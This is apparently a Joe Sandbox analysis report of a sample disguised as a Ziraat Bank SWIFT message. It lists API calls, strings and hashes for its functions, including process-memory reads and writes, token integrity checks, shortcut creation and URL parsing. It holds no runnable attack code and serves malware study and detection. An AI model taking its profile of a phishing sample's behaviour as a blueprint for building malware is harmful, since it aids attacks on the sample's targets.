GetLastError.KERNEL32 ref: 000A21F7
_free.LIBCMT ref: 000A2200
__dosmaperr.LIBCMT ref: 000A220B

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: c060fac9acc539f4d5070322234d35221bfee5c35fb8c88f2a13823f9aa49251
Instruction ID: 69cc50b1a34448f0b0b19423ce35555faf808d1fd498ba3e1139c8dc8460360e
Opcode Fuzzy Hash: c060fac9acc539f4d5070322234d35221bfee5c35fb8c88f2a13823f9aa49251
Instruction Fuzzy Hash: 7111C832104306AFDB21AFE9EC41EDB3BE8EF57770B104539F91886152DB71D85187A1

Function 000BABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BABD7
GetLastError.KERNEL32(?,000BA69F,?,?,?), ref: 000BABE1
GetProcessHeap.KERNEL32(00000008,?,?,000BA69F,?,?,?), ref: 000BABF0
HeapAlloc.KERNEL32(00000000,?,000BA69F,?,?,?), ref: 000BABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BAC0E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ab1a6dac491a19c405aa8c3fdcb48567b8dee7d12fba4626a1b950b9699495a0
Instruction ID: d407afcc348d0dfa7d4839293c8661420fb4b7b7e7cc9f7c2e802a4bdb01cf00
Opcode Fuzzy Hash: ab1a6dac491a19c405aa8c3fdcb48567b8dee7d12fba4626a1b950b9699495a0
Instruction Fuzzy Hash: 510119B1300204BFDB104FA9EC48DAB7FADEF8A7557100429F985D3260DAB19C80CB61

Function 000C7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C7A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C7A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C7A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7AD0

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f813bf8036300f43eb62fc996779f1426ac8e769984405879bec02abf02cb800
Instruction ID: f94b6a234581f625f367fdf31de9db733f3069f0f0b9e562248c6aea6b09b722
Opcode Fuzzy Hash: f813bf8036300f43eb62fc996779f1426ac8e769984405879bec02abf02cb800
Instruction Fuzzy Hash: 93014835C0862DEBCF10AFE5EC48AEDBBB8FF5C711F010459E546B2650DB7096908BA2

Function 000B9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 000B9ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 000B9AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 000B9B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000B9B15
CLSIDFromString.OLE32(?,?), ref: 000B9B21

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 0abd108eb740c5d893ef0328e9f3914bcf4768a17994c8f69a8f25263ce92116
Instruction ID: cf4e003774068ee033ccb6a30a09288a4ee0a89b3df102b4c067379385dbc67c
Opcode Fuzzy Hash: 0abd108eb740c5d893ef0328e9f3914bcf4768a17994c8f69a8f25263ce92116
Instruction Fuzzy Hash: 06018F7A600218BFDB104FA4ED44FAA7AEDEF44351F148025FA45E2210D7B1DD809BA0

Function 000BAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000BAA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000BAA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000BAA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000BAA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000BAAAF

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 633f69a713138ac24689a8eee41dea64459d9ff45558744a159695834d6f7847
Instruction ID: 5abdb35fb7d52ad309ab589e5c2627359af7c46f7aabc7ac3dee33259afd898b
Opcode Fuzzy Hash: 633f69a713138ac24689a8eee41dea64459d9ff45558744a159695834d6f7847
Instruction Fuzzy Hash: CCF04975200204AFEB115FE4AC89EAB3BACFF4A754F400429F985C71A0DBB09C81CA72

Function 000BAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000BAADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000BAAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BAAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000BAAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BAB10

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5c920d4a6637c06492794796ce6affb8f46ed24bed6fdf8ec98a0e2b356b3aa0
Instruction ID: c38dd7f0add9b8af911548fd7435d1f233217239efdb91b11b0b5b5c021a6308
Opcode Fuzzy Hash: 5c920d4a6637c06492794796ce6affb8f46ed24bed6fdf8ec98a0e2b356b3aa0
Instruction Fuzzy Hash: 6FF04F753102086FEB110FA4FC98EA73BADFF4A754F000029F995D7190CBB098818A61

Function 000BEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 000BEC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 000BECAB
MessageBeep.USER32(00000000), ref: 000BECC3
KillTimer.USER32(?,0000040A), ref: 000BECDF
EndDialog.USER32(?,00000001), ref: 000BECF9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9ac60ac60a9422154dfeb440b07ea9338bd573e29b8c97430f8903619ce949c1
Instruction ID: 9009edc2cd48af79748b0f7c5a97146b695e3b121795d7db53bb939e7b06ee36
Opcode Fuzzy Hash: 9ac60ac60a9422154dfeb440b07ea9338bd573e29b8c97430f8903619ce949c1
Instruction Fuzzy Hash: 26018130500744ABEB345B50EE4EBD67BB8FB00705F000559B586A18E1DBF0AA89CB80

Function 0009B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0009B0BA
StrokeAndFillPath.GDI32(?,?,000FE680,00000000,?,?,?), ref: 0009B0D6
SelectObject.GDI32(?,00000000), ref: 0009B0E9
DeleteObject.GDI32 ref: 0009B0FC
StrokePath.GDI32(?), ref: 0009B117

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f1a23ddd8965c3ada54bef970ccee73f419cc3ddd3840a2328a5de5b508c5c34
Instruction ID: 4f97a66bae298bd08982022702d3359cb4403b0d415159fb8d62c5410535d0bc
Opcode Fuzzy Hash: f1a23ddd8965c3ada54bef970ccee73f419cc3ddd3840a2328a5de5b508c5c34
Instruction Fuzzy Hash: BDF0F638004308AFCB219FA9FD087583BA4A702372F488314F569448F0C7B089D6DF50

Function 000CF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000CF2DA
CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CF2F2
CoUninitialize.OLE32 ref: 000CF555

Strings

.lnk, xrefs: 000CF28B, 000CF290, 000CF29E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: a8381e2b348ce3b7a9a11cfdbebc5c01d1243783fbfe617b82b5a38cfa87014d
Instruction ID: d65a5a0db2935344d8d074e3fdd9f221d0bf6ec5246e7ebe2111bdb86580af2c
Opcode Fuzzy Hash: a8381e2b348ce3b7a9a11cfdbebc5c01d1243783fbfe617b82b5a38cfa87014d
Instruction Fuzzy Hash: A3A10BB1104201AFD700EF64C891EAFB7E8FF98714F04491DF59597192EB70EA49CB62

Function 000CE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0008660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000853B1,?,?,000861FF,?,00000000,00000001,00000000), ref: 0008662F

CoInitialize.OLE32(00000000), ref: 000CE85D
CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CE876
CoUninitialize.OLE32 ref: 000CE893

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

Strings

.lnk, xrefs: 000CE83B, 000CE84D

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 491e523dca6e909d90a1457cac0776ead416b548d24e94fa2422f84a1477408d
Instruction ID: e34ff072dc4dec0aca087f58c78e32650424abfbad951244aebee71d58cf2c02
Opcode Fuzzy Hash: 491e523dca6e909d90a1457cac0776ead416b548d24e94fa2422f84a1477408d
Instruction Fuzzy Hash: 17A12275604241AFCB10EF14C884E6EBBE5FF88310F148959F99A9B3A2CB31ED45CB91

Function 000A325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 000A32ED

Part of subcall function 000AE0D0: __87except.LIBCMT ref: 000AE10B

Strings

pow, xrefs: 000A32C5, 000A32E2

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 111f79a411bc8ee3a66684c1c5630015560dc63751f0d17d01155d340b64f05c
Instruction ID: aaba059a758c1ce8a53bcda6e1c72ca263f7e7e1fae983a67ce1daa5b2795009
Opcode Fuzzy Hash: 111f79a411bc8ee3a66684c1c5630015560dc63751f0d17d01155d340b64f05c
Instruction Fuzzy Hash: 87513732A0C24196CB6577D8C9417BE7BD4DB43760F308D68F4C5862AAEF388ED49B42

Function 00081F21 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

+, xrefs: 00081F5D
#, xrefs: 00081F64

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: a74f3077c6a54dcded9015e3dab3212c985770abda3ac4196f3048f53a8d3b9e
Instruction ID: be9c0eec0ce0fd187dfd89f776acaadc9107fdcb92facdc5eb9b26b7ff97923a
Opcode Fuzzy Hash: a74f3077c6a54dcded9015e3dab3212c985770abda3ac4196f3048f53a8d3b9e
Instruction Fuzzy Hash: 7C51207150424A9FDB25EF29C844AFE7BE4BF25320F144055EDD1AB2A2D330DE42DB22

Function 000C4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,?,?,00000000,00000000,000000FF,?,00000004,?,0000000F,0000000C,?,00000000), ref: 000C4645

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

CharUpperBuffW.USER32(?,00000004,00000000,0000000C,?,00000000,00000000,000000FF,?,00000004,?,0000000F,0000000C,?,00000000), ref: 000C46C5

Strings

REMOVE, xrefs: 000C4676
THIS, xrefs: 000C4703

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 0ab96befd24d3f97fe1b6f4a03b8a3f1fa7dd65f473783bdce364db265bfa1f5
Instruction ID: fb0ed7e7e06337f6e0494677f65f99dc5c213be0bc83a919782deaab321f56b2
Opcode Fuzzy Hash: 0ab96befd24d3f97fe1b6f4a03b8a3f1fa7dd65f473783bdce364db265bfa1f5
Instruction Fuzzy Hash: D0416674A042199FCF01EFA4C891EAEB7F5BF49304F148069E956AB2A2DB30AD45CB50

Function 000BC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BBC08,?,?,00000034,00000800,?,00000034), ref: 000C4335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000BC1D3

Part of subcall function 000C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 000C4300

Part of subcall function 000C422F: GetWindowThreadProcessId.USER32(?,?), ref: 000C425A
Part of subcall function 000C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000C426A
Part of subcall function 000C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 000C4280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BC240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000BC28D

Strings

@, xrefs: 000BC2A5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 20434cb8065095e29bac6f2dd65fd12ad8c265d7ed9629efdb08dee5968cdaf1
Instruction ID: 4b3abcd4ce1379c691fbbf3da1625bc1d7a776ca9e8a8adb1ee94e429f52bc27
Opcode Fuzzy Hash: 20434cb8065095e29bac6f2dd65fd12ad8c265d7ed9629efdb08dee5968cdaf1
Instruction Fuzzy Hash: 5B411B72900218AFDB11DFA4CD92FEEB7B8FB49700F004099FA45B7181DA716E45CB61

Function 000D5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D5190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 000D51C6

Strings

D, xrefs: 000D522E
|, xrefs: 000D51B5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$D
API String ID: 1413715105-3794712380
Opcode ID: 11dbb2034b6b4e994734e460859859322d8989251e7d7bdf465e8db99416a5d4
Instruction ID: f8f08f1446bddbedd49826ec5e8e62c292af0bcb5bd3423e06b304378f259a37
Opcode Fuzzy Hash: 11dbb2034b6b4e994734e460859859322d8989251e7d7bdf465e8db99416a5d4
Instruction Fuzzy Hash: 64311971800119ABDF15AFE4CC85EEE7FB9FF19750F100016E815A6266DB31AA46DBA0

Function 000A65C3 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000A65DD

Strings

Genu, xrefs: 000A668E
ntel, xrefs: 000A66A0
ineI, xrefs: 000A6697

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID: Genu$ineI$ntel
API String ID: 2325560087-3389352399
Opcode ID: 3e5c164ff3ae685a3ad98f59bf8a023a28eea6540f7d90e0e61a46e9102dcb08
Instruction ID: 84727303050079d51196e5d885c67506fcd639fe60951b9dc554368a55f0c2d3
Opcode Fuzzy Hash: 3e5c164ff3ae685a3ad98f59bf8a023a28eea6540f7d90e0e61a46e9102dcb08
Instruction Fuzzy Hash: E0318BB1D017169BDB648FA9E84925AFBF0FB06714F18C53EE459E7A60C3769890CF40

Function 000A2288 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 000A22A1
GetProcAddress.KERNEL32(00000000), ref: 000A22A8

Strings

combase.dll, xrefs: 000A229C
RoInitialize, xrefs: 000A2290

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
